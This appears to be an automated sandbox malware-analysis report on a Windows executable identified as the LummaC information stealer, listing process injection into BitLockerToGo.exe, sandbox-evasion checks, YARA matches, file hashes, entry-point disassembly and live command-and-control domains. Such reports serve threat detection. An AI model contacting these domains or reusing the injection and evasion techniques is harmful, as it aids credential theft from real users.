Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006F3E12	1_2_006F3E12
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006F0ED0	1_2_006F0ED0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0071DF50	1_2_0071DF50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E6F00	1_2_006E6F00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E8FCE	1_2_006E8FCE

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 006FC710 appears 153 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 006EC7C0 appears 50 times

Source: file.exe, 00000000.00000002.1841067257.0000000000C4B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000002.1845237466.000000000150C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
Source: file.exe	Binary or memory string: OriginalFileName vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1845237466.0000000001546000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1845237466.0000000001680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/0@1/1

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_0071EB20 CoCreateInstance,SysAllocString,

1_2_0071EB20

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 26%

Source: file.exe	String found in binary or memory: net/addrselect.go
Source: file.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 6129152 > 1048576

Source: file.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x298c00
Source: file.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2d2200

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000002.1845237466.000000000150C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000002.1845237466.000000000150C000.00000004.00001000.00020000.00000000.sdmp

Source: file.exe

Static PE information: section name: .symtab

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00720466 push ds; ret		1_2_00720468
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006F6D75 push ebx; ret		1_2_006F6D77

Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7540

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: BitLockerToGo.exe, 00000001.00000002.1856895395.0000000000829000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1846685439.0000000000829000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: file.exe	Binary or memory string: main.YFHiCIiixcqEmuOlForkRgsVMgLNXhAujTFmOcP
Source: BitLockerToGo.exe, 00000001.00000002.1856895395.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1856895395.0000000000814000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1846685439.0000000000812000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe	Binary or memory string: main.xVFDfAARqjMemLyUDOzhCyJqReWzzAWruHqqEmUwOjMGu
Source: file.exe, 00000000.00000002.1843500175.0000000001474000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ymECWhxYrkkpjnZlrjPDSzJkDiTLdWCcvWIdBkmFQkjZElBIRukKygZKZdJqigldpvMCicgGyjGEvQVcW
Source: file.exe, 00000000.00000002.1842885416.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|\|

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

API call chain: ExitProcess graph end node

graph_1-16623

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_0071F650 LdrInitializeThunk,

1_2_0071F650

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: file.exe, 00000000.00000003.1831171869.00000000017CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: file.exe, 00000000.00000003.1831171869.00000000017CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: file.exe, 00000000.00000003.1831171869.00000000017CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: file.exe, 00000000.00000003.1831171869.00000000017CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: file.exe, 00000000.00000003.1831171869.00000000017CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: file.exe, 00000000.00000003.1831171869.00000000017CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: file.exe, 00000000.00000003.1831171869.00000000017CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: file.exe, 00000000.00000003.1831171869.00000000017CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 438008	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E1000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 72B000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 72E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 73D000	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	22 System Information Discovery	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	26%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ghostreedmnu.shop	188.114.96.3	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
fragnantbui.shop	true	unknown
gutterydhowi.shop	true	unknown
offensivedzvju.shop	true	unknown
drawzhotdog.shop	true	unknown
ghostreedmnu.shop	true	unknown
reinforcenh.shop	true	unknown
stogeneratmns.shop	true	unknown
vozmeatillu.shop	true	unknown
https://ghostreedmnu.shop/api	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	BitLockerToGo.exe, 00000001.00000003.1846685439.0000000000829000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1846663443.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://ghostreedmnu.shop/	BitLockerToGo.exe, 00000001.00000002.1856895395.00000000007F2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://api.midtrans.comGetUserDefaultLocaleNameinvalid	file.exe	false	unknown
https://api.sandbox.midtrans.comcrypto/aes:	file.exe	false	unknown
https://www.cloudflare.com/5xx-error-landing	BitLockerToGo.exe, 00000001.00000003.1846756761.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1846685439.0000000000829000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1846663443.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	ghostreedmnu.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1521592
Start date and time:	2024-09-29 00:53:31 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/0@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 88% Number of executed functions: 14 Number of non-executed functions: 81
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 7388 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
18:54:38	API Interceptor	1x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/
	Sept order.doc	Get hash	malicious	FormBook	Browse	www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	hdcy.emcl00.com/qRCfs/
	PO23100072.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ghostreedmnu.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	kewyIO69TI.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	gZzI6gTYn4.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	U6b3tLFqN5.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	0UB3FIL25c.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://btinternet-105262.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://swiftversedapp.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Full-Setup.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	https://ardam.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://krakennylog.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	104.16.117.116
	https://dappnoderestore.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://nftpack83.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://coin-pro-base-login.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	172.64.147.209
	http://nfthit7.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	104.18.18.237
	https://server.h74w.com/invite/84350172	Get hash	malicious	Unknown	Browse	104.21.52.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Full-Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	SmokeLoader	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz	Browse	188.114.96.3
	Trjscan_[7MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Trjscan_[7MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	injector V2.4.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	injector V2.4.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.456806489633868
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	6'129'152 bytes
MD5:	447de2327dc8ecd4830023a7d6c8ed64
SHA1:	5728f8c965ac1e71d373feedafdfd5b4528dd8ef
SHA256:	4f05a7585561eb31272758ecf586e5dcbe1b1064a4f59f9e1189b5a6dbabf90b
SHA512:	9d3b8baf0353c97e191ef6b546e101129c86720a6ef19febeb3c4e451e25e0f8a327fd69b73846f8a01306875b6b19a1717b45e6d1b5d9584155ea31f25ac551
SSDEEP:	49152:yLlt90ZzSvd+rMdmBcHF4mL8jIr1zrAwZK7eFiDrHb2rjPNtBO6NuxpGh5pFN7nM:klt9b+mV8ju1zJU6NuUpFN7nKGh39
TLSH:	65564B01FECB45F5EA07193550ABA27F53316D0A8B34CB8BEA547B6AF9376910C37209
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........\...............)..........)........V...@...........................`......;^...@................................

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x4729a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	1aae8bf580c846f39c71c05898e57e88

Entrypoint Preview

Instruction
jmp 00007FCE6CCF2750h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007FCE6CCCE726h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 00000BA0h
mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
mov dword ptr [edx+18h], ecx
mov dword ptr [edi], edx
mov dword ptr [esp+04h], edi
call 00007FCE6CCF4BA4h
cld
call 00007FCE6CCF3C3Eh
call 00007FCE6CCF2879h
add esp, 08h
ret
jmp 00007FCE6CCF4A50h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov ebp, esp
mov dword ptr fs:[00000034h], 00000000h
mov ecx, dword ptr [ebx+04h]
cmp ecx, 00000000h
je 00007FCE6CCF4A51h
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5d7000	0x44c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5fb000	0xe8f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5d8000	0x21710	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x56d8a0	0xb4	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
